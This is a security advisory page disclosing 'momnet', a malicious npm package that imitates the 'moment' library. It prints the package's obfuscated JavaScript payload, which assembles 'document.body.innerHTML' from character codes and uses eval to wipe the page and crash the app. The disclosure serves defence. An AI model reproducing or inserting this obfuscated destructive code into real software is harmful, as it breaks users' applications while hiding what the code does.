<p>Avoid using all malicious instances of the <code>momnet</code> package.</p>

Malicious Package Affecting momnet package, versions *

Snyk CVSS

Attack Complexity Low

Availability High

Threat Intelligence

Exploit Maturity Mature

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-JS-MOMNET-2324797
published 23 Dec 2021
disclosed 15 Dec 2021
credit Ophir Pickman

Report a new vulnerability Found a mistake?

Introduced: 15 Dec 2021

Malicious CWE-506 Open this link in a new tab

How to fix?

Avoid using all malicious instances of the momnet package.

Overview

momnet is a malicious package. The library pretends to be the popular moment library, which is used in generating timestamps in different time-zones and formats for front-end projects.

The malicious package is almost identical to the original library. The only difference is that it employs a different, crafted moment.min.js file of an unknown origin, rather than the library's own source.

Malicious Code

function anonymous() {
    var a = 100,
        b = 111,
        c = 99,
        d = 117,
        e = 109,
        f = 101,
        g = 110,
        h = 116,
        k = 98,
        l = 121,
        z = 105,
        x = 114,
        v = 72,
        n = 84,
        w = 77,
        q = 76,
        to = (e, t) => e + String.fromCharCode(t),
        j = [a, b, c, d, e, f, g, h].reduce(to, ""),
        p = [k, b, a, l].reduce(to, ""),
        r = [z, g, g, f, x, v, n, w, q].reduce(to, "");
    (() => {
        eval(`${j}.${p}.${r} = ''`);
    })();
}

The malicious method deletes the inner HTML body and as a result, crashes the app.

References

Illustria Blog